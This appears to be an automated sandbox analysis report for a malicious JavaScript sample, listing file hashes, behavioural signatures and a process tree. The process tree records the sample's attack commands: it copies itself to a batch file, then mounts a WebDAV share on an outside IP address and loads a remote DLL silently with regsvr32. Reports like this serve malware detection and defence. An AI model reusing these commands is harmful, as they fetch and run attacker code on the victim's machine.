Analysis
-
max time kernel
93s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
11-07-2024 04:17
Static task
static1
Behavioral task
behavioral1
Sample
29980298661952420504.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
29980298661952420504.js
Resource
win10v2004-20240704-en
General
-
Target
29980298661952420504.js
-
Size
5KB
-
MD5
ebabe2a2f43f3f24055a49ca602bc5fe
-
SHA1
dacbdce1b2d3c037a6b28c841cbe565a0edd87e0
-
SHA256
1493244d5d2e3f6e1dd70af0900f7dcad52e26e2b4e5ec55f8f882788b8da1dc
-
SHA512
c3e85af6fb6014023028849379324099e04d4ee03ee967c3e2bc11a400baa7670254d08de08838cf3653a6f9a3ef0aa3332c73fb671293600e9346d3976ed65c
-
SSDEEP
96:OX0IBi5g4gbMNXKOR7ORlMdvvU8L/ViQh1HujtFHuVEL1kfLI:ANfMNak7klMdj4Y1HujtFHuVEL1kfLI
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3556 wrote to memory of 116 3556 wscript.exe 82 PID 3556 wrote to memory of 116 3556 wscript.exe 82 PID 116 wrote to memory of 4848 116 cmd.exe 84 PID 116 wrote to memory of 4848 116 cmd.exe 84 PID 116 wrote to memory of 5020 116 cmd.exe 86 PID 116 wrote to memory of 5020 116 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\29980298661952420504.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\29980298661952420504.js" "C:\Users\Admin\\eefzgv.bat" && "C:\Users\Admin\\eefzgv.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:116 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:4848
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\820.dll3⤵PID:5020
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5ebabe2a2f43f3f24055a49ca602bc5fe
SHA1dacbdce1b2d3c037a6b28c841cbe565a0edd87e0
SHA2561493244d5d2e3f6e1dd70af0900f7dcad52e26e2b4e5ec55f8f882788b8da1dc
SHA512c3e85af6fb6014023028849379324099e04d4ee03ee967c3e2bc11a400baa7670254d08de08838cf3653a6f9a3ef0aa3332c73fb671293600e9346d3976ed65c